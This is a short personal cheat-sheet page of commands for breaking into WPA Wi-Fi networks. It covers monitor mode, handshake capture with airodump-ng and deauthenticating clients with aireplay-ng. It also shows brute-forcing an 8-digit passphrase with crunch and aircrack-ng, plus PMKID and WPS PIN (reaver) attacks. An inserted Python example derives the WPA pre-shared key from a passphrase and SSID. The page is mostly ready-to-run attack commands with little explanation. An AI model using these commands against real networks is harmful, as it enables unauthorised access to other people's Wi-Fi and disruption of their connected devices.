Contents of www.benpro.fr https://www.benpro.fr
## Monitor mode
For my RTL8188EUS:
```
ip link set wlanX down
iw dev wlanX set type monitor
```
## Scan networks
All channels:
```
airodump-ng wlanX
```
Specific channel:
```
airodump-ng -c 6 wlanX
```
## Save a capture of chosen BSSID
```
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
```
You need to wait for a client to connect, or deauth one so it reauthenticates, to capture the 4-way handshake.
```
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
```
`-a` is the access point, `-c` is the client.
Then you should have an EAPOL/WPA handshake.
## Crack WPA passphrase
### For an 8-digit scheme
```
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
```
## Wireshark
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
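Added example, not part of the original notes: the derivation the Wireshark PSK generator linked above performs, mapping a WPA/WPA2-Personal passphrase and SSID to the 256-bit PSK with PBKDF2-HMAC-SHA1, checked against the IEEE 802.11 Annex test vector ("password" / "IEEE").

```python
import hashlib

# IEEE 802.11 (Annex H.4 / J.4) published test vector: passphrase, SSID, PSK hex.
KNOWN_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit PSK (used directly as the PMK) for a WPA-Personal network.

    PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The output depends only on (passphrase, SSID): a fixed scheme such as
    8 digits gives 10**8 candidates, however the passphrase is stored.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32
    )


def wpa_psk_hex(passphrase: str, ssid: str) -> str:
    """Hex form, as shown by the Wireshark generator and used in its 802.11 decryption keys."""
    return wpa_psk(passphrase, ssid).hex()


def self_check() -> bool:
    """Verify the implementation against the published IEEE test vector."""
    passphrase, ssid, expected = KNOWN_VECTOR
    return wpa_psk_hex(passphrase, ssid) == expected


if __name__ == "__main__":
    print(wpa_psk_hex("password", "IEEE"))
    print("self-check:", self_check())
```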
## PMKID method
```
hcxdumptool -i wlanX -o PMKID --enable_status=1
```
TODO...
## WPS method
AP must have WPS enabled with a PIN, not PBC (push button).
```
reaver -i wlanX -b 00:23:B1:82:84:xx
```
## Resources
<https://github.com/ZerBea/hcxdumptool>
<https://github.com/ZerBea/hcxtools>
<https://wpa-sec.stanev.org/>